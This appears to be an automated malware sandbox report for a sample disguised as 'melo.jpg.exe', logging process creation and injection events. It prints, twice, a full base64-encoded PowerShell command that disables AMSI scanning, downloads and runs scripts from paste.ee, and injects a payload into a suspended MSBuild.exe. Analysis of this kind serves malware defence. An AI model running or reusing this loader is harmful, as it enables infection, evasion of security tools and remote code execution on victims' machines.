file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Executed a process and injected code into it, probably while unpacking (19 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 22, 2021, 5:19 p.m.	thread_identifier: 652 thread_handle: 0x00000134 process_identifier: 2352 current_directory: C:\Windows\SysWOW64 filepath: track: 1 command_line: powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA== filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000138	1	1
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2352	1	0
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2352	1	0
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2352	1	0
CreateProcessInternalW April 22, 2021, 5:19 p.m.	thread_identifier: 8956 thread_handle: 0x00000448 process_identifier: 6096 current_directory: C:\Windows\SysWOW64 filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA== filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x0000044c	1	1
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x00000490 suspend_count: 1 process_identifier: 2352	1	0
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 6096	1	0
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x000002f4 suspend_count: 1 process_identifier: 6096	1	0
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x0000045c suspend_count: 1 process_identifier: 6096	1	0
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x000005b4 suspend_count: 1 process_identifier: 6096	1	0
CreateProcessInternalW April 22, 2021, 5:19 p.m.	thread_identifier: 2228 thread_handle: 0x0000033c process_identifier: 3752 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe track: 1 command_line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" filepath_r: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000036c	1	1
NtGetContextThread April 22, 2021, 5:19 p.m.	thread_handle: 0x0000033c	1	0
NtAllocateVirtualMemory April 22, 2021, 5:19 p.m.	process_identifier: 3752 region_size: 36864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000036c	1	0
WriteProcessMemory April 22, 2021, 5:19 p.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELqÂ[àH1)@Ñ.text¿~ à base_address: 0x00400000 process_identifier: 3752 process_handle: 0x0000036c	1	1
WriteProcessMemory April 22, 2021, 5:19 p.m.	buffer: base_address: 0x00401000 process_identifier: 3752 process_handle: 0x0000036c	1	1
WriteProcessMemory April 22, 2021, 5:19 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3752 process_handle: 0x0000036c	1	1
NtSetContextThread April 22, 2021, 5:19 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4204849 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000033c process_identifier: 3752	1	0
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x0000033c suspend_count: 1 process_identifier: 3752	1	0
NtResumeThread April 22, 2021, 5:19 p.m.	thread_handle: 0x000003b0 suspend_count: 1 process_identifier: 6096	1	0

melo.jpg.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All